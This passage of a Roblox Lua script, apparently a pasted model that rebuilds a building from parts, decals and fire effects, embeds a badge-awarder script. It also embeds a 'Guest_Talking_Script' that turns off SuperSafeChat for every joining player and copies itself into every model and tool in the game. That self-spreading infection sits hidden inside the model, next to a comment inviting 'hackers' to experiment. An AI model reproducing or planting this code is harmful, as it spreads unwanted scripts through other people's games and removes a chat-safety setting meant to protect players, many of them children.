  4448. ["Color"] = Color3.new(0.0666667, 0.0666667, 0.0666667),
  4449. })
  4450. o452 = Create("Decal",{
  4451. ["Parent"] = o451,
  4452. ["Texture"] = "http://www.roblox.com/asset/?id=51290705",
  4453. ["Face"] = Enum.NormalId.Top,
  4454. })
  4455. o453 = Create("IntValue",{
  4456. ["Name"] = "BadgeID",
  4457. ["Parent"] = o451,
  4458. ["Value"] = 51290900,
  4459. })
  4460. o454 = Create("Script",{
  4461. ["Name"] = "BadgeAwarderScript",
  4462. ["Parent"] = o451,
  4463. })
  4464. table.insert(cors,coroutine.create(function()
  4465. wait()
  4466. runDummyScript(function()
  4467. print("Badge Awarder Loaded. BadgeID: " .. script.Parent.BadgeID.Value)
  4468.  
  4469.  
  4470.  
  4471. -- ROBLOX scripter hackers, see what you can do with this:
  4472. -- game:GetService("BadgeService"):UserHasBadge(userid, badgeid)
  4473.  
  4474.  
  4475. function OnTouch(part)
  4476. if (part.Parent:FindFirstChild("Humanoid") ~= nil) then
  4477. local p = game.Players:GetPlayerFromCharacter(part.Parent)
  4478. if (p ~= nil) then
  4479. print("Awarding BadgeID: " ..script.Parent.BadgeID.Value .. " to UserID: " .. p.userId)
  4480. local b = game:GetService("BadgeService")
  4481. b:AwardBadge(p.userId, script.Parent.BadgeID.Value)
  4482. end
  4483. end
  4484. end
  4485.  
  4486. script.Parent.Touched:connect(OnTouch)
  4487.  
  4488. end,o454)
  4489. end))
  4490. o455 = Create("Fire",{
  4491. ["Parent"] = o451,
  4492. ["Size"] = 30,
  4493. ["Color"] = Color3.new(1, 0.788235, 0),
  4494. ["Enabled"] = false,
  4495. ["Heat"] = 25,
  4496. ["SecondaryColor"] = Color3.new(1, 0, 0),
  4497. })
  4498. o456 = Create("Script",{
  4499. ["Name"] = "Guest_Talking_Script",
  4500. ["Parent"] = o450,
  4501. })
  4502. table.insert(cors,coroutine.create(function()
  4503. wait()
  4504. runDummyScript(function()
  4505. if (script.Parent == workspace) then
  4506. function checkForAndSwitch(player)
  4507. if (player.SuperSafeChat == true) then
  4508. player.SuperSafeChat = false;
  4509. wait(5);
  4510. local m = Instance.new("Message");
  4511. m.Text = "Press the / key to start typing.";
  4512. m.Parent = player;
  4513. wait(5);
  4514. m.Text = "Then press Enter to send your message.";
  4515. wait(5);
  4516. m:Remove();
  4517. m = nil;
  4518. end
  4519. player = nil;
  4520. collectgarbage("collect");
  4521. end
  4522.  
  4523. function onChildAddedToPlayers(obj)
  4524. if (obj.className == "Player") then
  4525. checkForAndSwitch(obj);
  4526. local m = Instance.new("Message");
  4527. m.Text = "welcome me place!!!";
  4528. m.Parent = obj;
  4529. wait(5);
  4530. m:Remove();
  4531. m = nil;
  4532. end
  4533. obj = nil;
  4534. collectgarbage("collect");
  4535. end
  4536.  
  4537. function onChildAddedToWorkspace(obj)
  4538. if (obj.className == "Model") then
  4539. if (game.Players:playerFromCharacter(obj) ~= nil) then
  4540. checkForAndSwitch(game.Players:playerFromCharacter(obj));
  4541. end
  4542. end
  4543. obj = nil;
  4544. collectgarbage("collect");
  4545. end
  4546.  
  4547. function findLowestLevel(obj)
  4548. local c = obj:GetChildren();
  4549. local lowestLevel = true;
  4550.  
  4551. for i, v in pairs(c) do
  4552. if (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
  4553. lowestLevel = false;
  4554. wait();
  4555. findLowestLevel(v);
  4556. end
  4557. end
  4558.  
  4559. if (obj ~= workspace and lowestLevel == true and (obj:FindFirstChild(script.Name) == nil)) then
  4560. if (obj ~= game.Lighting and obj ~= game.StarterPack) then
  4561. local s = script:Clone();
  4562. s.Parent = obj;
  4563. end
  4564. end
  4565. end
  4566.  
  4567. findLowestLevel(game);
  4568.  
  4569. game.Players.ChildAdded:connect(onChildAddedToPlayers);
  4570. game.Workspace.ChildAdded:connect(onChildAddedToWorkspace);
  4571. else
  4572. local findScript = workspace:FindFirstChild(script.Name);
  4573.  
  4574. if (findScript == nil) then
  4575. local s = script:Clone();
  4576. s.Parent = workspace;
  4577. end
  4578. end
  4579.  
  4580. --[[function findAllCopies(obj)
  4581. local c = obj:GetChildren();
  4582.  
  4583. for i, v in pairs(c) do
  4584. if (v.Name == script.Name and v.className == "Script" and v ~= script) then
  4585. v.Parent = nil;
  4586. elseif (v.className == "Model" or v.className == "Tool" or v.className == "HopperBin" or v == workspace or v == game.Lighting or v == game.StarterPack) then
  4587. findAllCopies(v);
  4588. end
  4589. end
  4590. end
  4591.  
  4592. findAllCopies(game);
  4593.  
  4594. script.Parent = nil;]]
  4595. end,o456)
  4596. end))
  4597. o458 = Create("Weld",{
  4598. ["Name"] = "J0HN",
  4599. ["Parent"] = o456,
  4600. })
  4601. o459 = Create("Part",{
  4602. ["Parent"] = o1,
  4603. ["Material"] = Enum.Material.CorrodedMetal,
  4604. ["BrickColor"] = BrickColor.new("Institutional white"),
  4605. ["Position"] = Vector3.new(-17.900116, 163.190109, 127.299652),
  4606. ["Rotation"] = Vector3.new(0, 90, 0),
  4607. ["Anchored"] = true,
  4608. ["CFrame"] = CFrame.new(-17.900116, 163.190109, 127.299652, 0, 0, 1, 0, 1, 0, -1, 0, 0),
  4609. ["CanCollide"] = false,
  4610. ["Size"] = Vector3.new(8, 9.60000038, 2),
  4611. ["TopSurface"] = Enum.SurfaceType.Smooth,
  4612. ["Color"] = Color3.new(0.972549, 0.972549, 0.972549),
  4613. })
  4614. o460 = Create("Decal",{
  4615. ["Parent"] = o459,
  4616. ["Texture"] = "http://www.roblox.com/asset/?id=2752460",
  4617. ["Face"] = Enum.NormalId.Back,
  4618. })
  4619. o461 = Create("Fire",{
  4620. ["Parent"] = o459,
  4621. ["Size"] = 30,
  4622. ["Color"] = Color3.new(1, 0.788235, 0),
  4623. ["Enabled"] = false,
  4624. ["Heat"] = 25,
  4625. ["SecondaryColor"] = Color3.new(1, 0, 0),
  4626. })
  4627. o462 = Create("Decal",{
  4628. ["Parent"] = o459,
  4629. ["Texture"] = "http://www.roblox.com/asset/?id=2752460",
  4630. })
  4631. mas.Parent = workspace
  4632. mas:MakeJoints()
  4633. local mas1 = mas:GetChildren()
  4634. for i=1,#mas1 do
  4635. mas1[i].Parent = script
  4636. ypcall(function() mas1[i]:MakeJoints() end)
  4637. end
  4638. mas:Destroy()
  4639. for i=1,#cors do
  4640. coroutine.resume(cors[i])
  4641. end
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement